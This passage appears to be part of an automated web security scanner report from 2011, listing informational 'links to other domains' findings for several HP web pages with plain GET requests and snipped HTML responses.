<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 height=15px width=19px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.wallstreetoasis.com/forums/houlihan-lokey-exit-opps%26hl%3Den%26client%3Dca-pub-3778324252021022%26adU%3Dwww.cfainstitute.org%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNFiehdmDytNB6c8pUH7atRdAVjSXQ" target=_blank><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png width=77px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110824/r20110719/abg.js"></script>
...[SNIP]...

17.41. http://h10088.www1.hp.com/cda/gap/display/main/index.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h10088.www1.hp.com
Path:   /cda/gap/display/main/index.jsp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cda/gap/display/main/index.jsp?zn=gap&cp=20000-13698-16013_4041_100 HTTP/1.1
Host: h10088.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: proxy-revalidate
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Date: Sun, 04 Sep 2011 16:30:58 GMT
Content-Length: 23777
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>
   HP - Graphic Arts - HP Designjet Portfolio</title>
<met
...[SNIP]...
<!-- CSS positioning code -->
<link rel="stylesheet" type="text/css" href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css">    
<link rel="stylesheet" type="text/css" href="/cda/gap/css/gapadd09.css">
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/js/hpweb_soctag.js"></script>
...[SNIP]...
<!-- CSS Print file -->
<link rel="stylesheet" type="text/css" media="print" href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_print.css">
<style type="text/css">
...[SNIP]...
<img height="16px" src="/cda/gap/img/world.gif" />
                   <img src="http://welcome.hp-ww.com/img/s.gif" height="1px" width="5px" />
<img src="/cda/gap/img/flags/us_en_flag.gif" />                        
<img src="http://welcome.hp-ww.com/img/s.gif" height="1px" width="20px" />

<a href="/cda/gap/display/main/index.jsp?zn=gap&cp=20000-26255-26256_4041_100__">
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" title="HP.com home"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="" border="0"><span class="screenReading">
...[SNIP]...
<div class="column3-4">
<object id="banner_v2" height="350" width="710" align="middle" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0"><param name="allowScriptAccess" value="always" />
...[SNIP]...
<br />
<object id="hp_industry_gross" align="middle" height="180" width="710" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"><param name="allowScriptAccess" value="always" />
...[SNIP]...
<!-- Begin METRICS Javascript -->
<script language="JavaScript" type="text/javascript" src="http://welcome.hp-ww.com/cma/segment/ww/ga/metricsGA.js"></script>
...[SNIP]...

17.42. http://h20180.www2.hp.com/apps/Nav  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h20180.www2.hp.com
Path:   /apps/Nav

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /apps/Nav?h_pagetype=s-005&h_cc=us&h_lang=en&h_page=hpcom&h_product=top&h_client=test HTTP/1.1
Host: h20180.www2.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:31:03 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Sun, 04 Sep 2011 18:31:03 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 22420

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
...[SNIP]...
</script><script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
<a href="#jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Jump to content" border="0"></a>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="24" alt="" border="0"></td>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt=""></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif" border="0" alt="HP.com United States Home" width="100" height="24"></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td><td><a href="http://welcome.hp.com/country/us/en/prodserv.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif" border="0" alt="Products and Services" width="166" height="24"></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td><td><a href="http://welcome.hp.com/country/us/en/support.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif" border="0" alt="Support & Drivers" width="163" height="24"></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td><td><a href="http://welcome.hp.com/country/us/en/solutions.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif" border="0" alt="Solutions" width="143" height="24"></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td><td><a href="http://welcome.hp.com/country/us/en/howtobuy.html"><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif" border="0" alt="How to Buy" width="143" height="24"></a></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
...[SNIP]...
<td width="20" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="48" alt="" class="decoration"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<td valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt="" class="decoration"></td>
...[SNIP]...
<input type="text" name="qt" size="26" maxlength="1991" id="qt" alt="Enter search criteria here"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt=""><a id="country" onmouseover="status='Search using the specified criteria';return true;" onmouseout="status='';return true;" onFocus="status='Search using the specified criteria';return true;" onBlur="s
...[SNIP]...
</a><img src="http://welcome.hp-ww.com/img/s.gif" width="9" height="1" alt="" border="0"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt=""></td><td align="left"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt="" class="decoration"></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="HP.com United States Home" border="0"></a><br></td><td width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="93" alt=""></td>
...[SNIP]...
<br><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="6" alt=""><h1>HP Products<br></h1><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="">E-mail HP for product support</td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td><td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td><td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td><td align="left" width="120"><img src="http://welcome.hp-ww.com/img/s.gif" width="120" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3" class="colorCCCCCCbg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<a name="jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Content starts here"></a>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td></tr><tr><td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt=""></td>
...[SNIP]...
<td width="10" align="left" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td class="theme" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td class="colorE7E7E7bg" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" border="0" alt=""></td><td class="colorE7E7E7bg" width="160" colspan="2"><img src="http://welcome.hp-ww.com/img/s.gif" width="160" height="1" border="0" alt=""></td><td class="colorE7E7E7bg" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" border="0" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td width="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" border="0" alt=""></td>
...[SNIP]...
<td width="1"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" border="0" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="160" height="15" border="0" alt="" class="decoration"></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<br><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="8" alt=""></td><td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="160" height="15" border="0" alt="" class="decoration"></td>
...[SNIP]...
<td align="center" valign="bottom" width="170" bgcolor="#F0F0F0"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_prnt_icn.gif" width="19" height="13" alt="" border="0"><a href="/apps/Nav?h_dt=printableversion&h_client=test&h_page=hpcom&h_pagetype=s-005&h_cc=us&h_lang=en&h_product=top&lang=en&cc=us" class="udrlinebold">
...[SNIP]...
<td width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="60" alt="" border="0"></td></tr><tr><td align="center" valign="bottom" width="170" bgcolor="#F0F0F0"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" border="0"></td>
...[SNIP]...
<td width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<td class="color666666bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<!-- SiteCatalyst code version: G.0.
Copyright 1997-2003 Omniture, Inc. More info available at
http://www.omniture.com --><script language="JavaScript" src="http://welcome.hp-ww.com/country/us/eng/js/hub/metrics.js"></script>
...[SNIP]...

17.43. https://h30046.www3.hp.com/subchoice/country/us/en/subhub.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://h30046.www3.hp.com
Path:   /subchoice/country/us/en/subhub.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /subchoice/country/us/en/subhub.aspx?exp=publicsector HTTP/1.1
Host: h30046.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 16:31:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: lang=en-us; path=/
Set-Cookie: cc=us; path=/
Set-Cookie: hp_xp=; expires=Mon, 05-Sep-2011 00:31:08 GMT; path=/; secure
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 93116


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="ctl00_ctl00_htmlTag" xmlns="http://www.w3.org/1999/xhtml" lang="e
...[SNIP]...
</script> <script type="text/javascript" src="https://secure.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
<!-- BEGIN OMNITURE METRICS JAVASCRIPT--> <script type="text/javascript" src="https://secure.hp-ww.com/country/us/eng/js/metricsNApubmktg.js"></script>
...[SNIP]...

17.44. http://h30187.www3.hp.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?tab=atHome&mcid=hho HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:13 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:19 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 63622
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
</script>

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css"
type="text/css" rel="stylesheet">

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">

<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" onmousedown="return Powered.WebAnalytics.recordClick(this, '');" title="HP.com home"><img
src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif"
width="64" height="55" alt=""
border="0">
<span class="screenReading">
...[SNIP]...
&BEID=19701&SBLID=&jumpid=in_r2910_VRbundles/psgpromo/subs/heasmith" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104916');" target="_blank">
<img src="http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000" border="0" alt="HP Virtual Rooms" />
</a>
...[SNIP]...
<a href="/courses/overview/p/courseId/35830/Create_and_print_you.htm?campusId=11200" ><img src="http://hplc-prod.s3.amazonaws.com/media/46212/Create_and_print_your_own_high-quality_marketing_materials_180x110.jpg?v=1281723193000" border="0" alt="Create and print your own high-quality marketing materials"/></a>
...[SNIP]...
<a href="/campus/p/campusId/11261/Digital_photography.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/46048/digital-photography.jpg?v=1281723386000" alt="Digital photography"/></a>
...[SNIP]...
<a href="/campus/p/campusId/11262/Home_office.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/46049/home-office.jpg?v=1281723061000" alt="Home office"/></a>
...[SNIP]...
<a href="/campus/p/campusId/11263/Microsoft_Office_and_Adobe.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/46050/ms-office-adobe-home.jpg?v=1281723061000" alt="Microsoft Office and Adobe"/></a>
...[SNIP]...
<a href="/campus/p/campusId/11264/PC_security_and_maintenance.htm" ><img src="http://hplc-prod.s3.amazonaws.com/media/46051/pc-security-home.jpg?v=1281723387000" alt="PC security and maintenance"/></a>
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
</span>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=8,0,0,0" width="220" height="12" id="polling" align="top">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
/cache/309717-0-0-225-121.html?jumpid=re_r602_oc_home_prod_ipg_oct10_totalcare" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104924');">
<img
width="64"
height="64"
border="0"
alt="Extended Service Plan"
src="http://hplc-prod.s3.amazonaws.com/media/50488/Total_care_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
tegory=photosmart_printers&jumpid=re_r602_oc_home_prod_ipg_oct10_photoprinters" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104917');">
<img
width="64"
height="64"
border="0"
alt="Photo Printer"
src="http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
pping/accessories_landing.do?jumpid=re_r602_oc_home_prod_ipg_oct10_accessories" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104923');">
<img
width="64"
height="64"
border="0"
alt="Accessories"
src="http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
atLevel=1&storeName=storefronts&jumpid=re_r602_oc_home_prod_ipg_oct10_allinone" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104918');">
<img
width="64"
height="64"
border="0"
alt="All in One"
src="http://hplc-prod.s3.amazonaws.com/media/50481/all_in_one_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
template_type=printer_supp_acc&jumpid=re_r602_oc_home_prod_ipg_oct10_inkpaper " onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104919');">
<img
width="64"
height="64"
border="0"
alt="Ink and Paper"
src="http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
te_type=landing&landing=scanner&jumpid=re_r602_oc_home_prod_ipg_oct10_scanners" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=700&eventType=PDC&productId=104922');">
<img
width="64"
height="64"
border="0"
alt="Scanners"
src="http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg?v=1288625341000"
/>


</a>
...[SNIP]...
<!-- BEGIN KEYLIME + OMNITURE METRICS JAVASCRIPT -->
<script type="text/javascript"
src="http://welcome.hp-ww.com/country/us/eng/js/metricsNAUSmktg.js">
</script>
...[SNIP]...

17.45. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /campus/p/campusId/10640/Graphic_arts.htm?webPageId=1000000 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 16:31:19 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Fri, 22-Sep-2079 19:45:26 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc05.ec2.powered.com
X-Nginx-Member: hplc05.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 56713
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
Learning center
...[SNIP]...
</script>

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_styles_mac.css"
type="text/css" rel="stylesheet">

<link href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css"
type="text/css" rel="stylesheet">

<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js">
</script>
<script type="text/javascript" language="JavaScript"
src="http://welcome.hp-ww.com/js/hpweb_soctag.js">
</script>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" onmousedown="return Powered.WebAnalytics.recordClick(this, '');" title="HP.com home"><img
src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif"
width="64" height="55" alt=""
border="0">
<span class="screenReading">
...[SNIP]...
EID=19701&SBLID=&jumpid=in_r2910_VRbundles/psgpromo/subs/heasmith" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104916');" target="_blank">
<img src="http://hplc-prod.s3.amazonaws.com/media/50471/virtualRooms_v2_148.jpg?v=1287408819000" border="0" alt="HP Virtual Rooms" />
</a>
...[SNIP]...
<a href="/courses/overview/p/courseId/34389/Adobe_Photoshop_CS4_introduction.htm?courseSessionId=306003&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/43988/Adobe_Photoshop_CS4_introduction_64x64.jpg?v=1281722923000" alt="Adobe Photoshop CS4: introduction" border="0"/></a>
...[SNIP]...
<a href="/articles/viewArticle/p/courseId/39570/Adobe_Photoshop_CS4_layer_basics_quick_lesson_.htm?courseSessionId=306047&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49584/Adobe_Photoshop_CS4_layer_basics_64x64.jpg?v=1281733557000" alt="Adobe Photoshop CS4: layer basics (quick lesson)" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/7/Building_your_first_web_page.htm?courseSessionId=319918&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/46149/Building_your_first_web_page_64x64.jpg?v=1281723189000" alt="Building your first web page" border="0"/></a>
...[SNIP]...
<a href="/articles/viewArticle/p/courseId/39808/Changing_hue_and_sat.htm?courseSessionId=320072&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49719/Change_hue_saturation_Photoshop_CS4_64x64.jpg?v=1281735208000" alt="Changing hue and saturation in Adobe.. Photoshop.. CS4 (quick lesson)" border="0"/></a>
...[SNIP]...
<a href="/articles/viewArticle/p/courseId/39807/Exploring_color_mode.htm?courseSessionId=320073&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49717/Explore_color_modes_Photoshop_CS4_64x64.jpg?v=1281735207000" alt="Exploring color modes in Adobe.. Photoshop.. CS4 (quick lesson)" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/23629/Intermediate_website_design.htm?courseSessionId=306011&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/40527/Intermediate_website_design_64x64.jpg?v=1281721718000" alt="Intermediate website design" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/12976/Jump_start_your_crea.htm?courseSessionId=306013&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/33169/jump-start_your_creativity_64x64.jpg?v=1281719082000" alt="Jump-start your creativity: exploring Leonardo da Vinci's notebooks" border="0"/></a>
...[SNIP]...
<a href="/articles/viewArticle/p/courseId/38756/Photoshop_101_image_.htm?courseSessionId=305979&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/48894/Photoshop_101_image_size_and_resolution_basics_64x64.jpg?v=1281728528000" alt="Photoshop 101: image size and resolution basics (quick lesson)" border="0"/></a>
...[SNIP]...
<a href="/courses/overview/p/courseId/39129/Print_marketing_mate.htm?courseSessionId=306031&campusId=10640"><img src="http://hplc-prod.s3.amazonaws.com/media/49070/Print_marketing_materials_in-house_on_a_wide-format_printer_64x64.jpg?v=1281731127000" alt="Print marketing materials in-house on a wide-format printer" border="0"/></a>
...[SNIP]...
_type=landing&landing=scanner&jumpid=re_r602_oc_home_prod_ipg_oct10_scanners" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104922');">
<img
width="64"
height="64"
border="0"
alt="Scanners"
src="http://hplc-prod.s3.amazonaws.com/media/50485/BN_scanners_64.jpg?v=1288625341000"
/>


</a>
...[SNIP]...
uter_store&landing=notebooks&jumpid=re_r602_oc_home_prod_psg_oct10_notebooks" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104921');">
<img
width="64"
height="64"
border="0"
alt="Notebooks"
src="http://hplc-prod.s3.amazonaws.com/media/50484/notebooks_64.jpg?v=1288625341000"
/>


</a>
...[SNIP]...
mplate_type=printer_supp_acc&jumpid=re_r602_oc_home_prod_ipg_oct10_inkpaper " onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104919');">
<img
width="64"
height="64"
border="0"
alt="Ink and Paper"
src="http://hplc-prod.s3.amazonaws.com/media/50482/ink_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
gory=photosmart_printers&jumpid=re_r602_oc_home_prod_ipg_oct10_photoprinters" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104917');">
<img
width="64"
height="64"
border="0"
alt="Photo Printer"
src="http://hplc-prod.s3.amazonaws.com/media/50480/photo_printer_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
ing/accessories_landing.do?jumpid=re_r602_oc_home_prod_ipg_oct10_accessories" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104923');">
<img
width="64"
height="64"
border="0"
alt="Accessories"
src="http://hplc-prod.s3.amazonaws.com/media/50487/BN-mouse_key_usb_64.jpg?v=1288625342000"
/>


</a>
...[SNIP]...
Level=1&storeName=storefronts&jumpid=re_r602_oc_home_prod_ipg_oct10_allinone" onmousedown="return Powered.WebAnalytics.recordClick(this, 'campusId=10640&eventType=PDC&productId=104918');">
<img
width="64"
height="64"
border="0"
alt="All in One"
